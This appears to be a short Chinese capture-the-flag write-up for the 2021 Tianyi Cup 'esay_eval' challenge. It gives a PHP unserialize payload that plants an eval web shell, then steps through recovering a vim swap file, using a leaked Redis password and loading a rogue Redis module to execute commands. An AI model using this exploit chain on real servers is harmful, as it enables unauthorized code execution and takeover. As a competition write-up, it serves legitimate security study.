#[天翼杯 2021]esay_eval
exp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
| <?php
highlight_file(__FILE__);
class A{
public $code = "eval(\$_POST[1]);";
}
class B{
public $a;
function __construct()
{
$this -> a=new A();
}
}
$c = new B();
$poc = serialize($c);
// echo $poc."<br>";
$payload = str_replace('A":1','a":2',$poc);
echo '?poc='.$payload;
|
用蚁剑连上,发现有vim缓存泄露,用vim恢复后发现这个题用了redis,然后利用redis进行RCE
1
2
3
4
5
| redis密码:you_cannot_guess_it
redis管理插件(蚁剑):
git clone https://github.com/Medicean/AS_Redis.git
恶意exp:
git clone https://github.com/Dliv3/redis-rogue-server.git
|
- 上传exp.so到/var/www/html下
- 连接redis执行命令 MODULE LOAD “/var/www/html/exp.so”
- RCE: system.exec “你的命令”
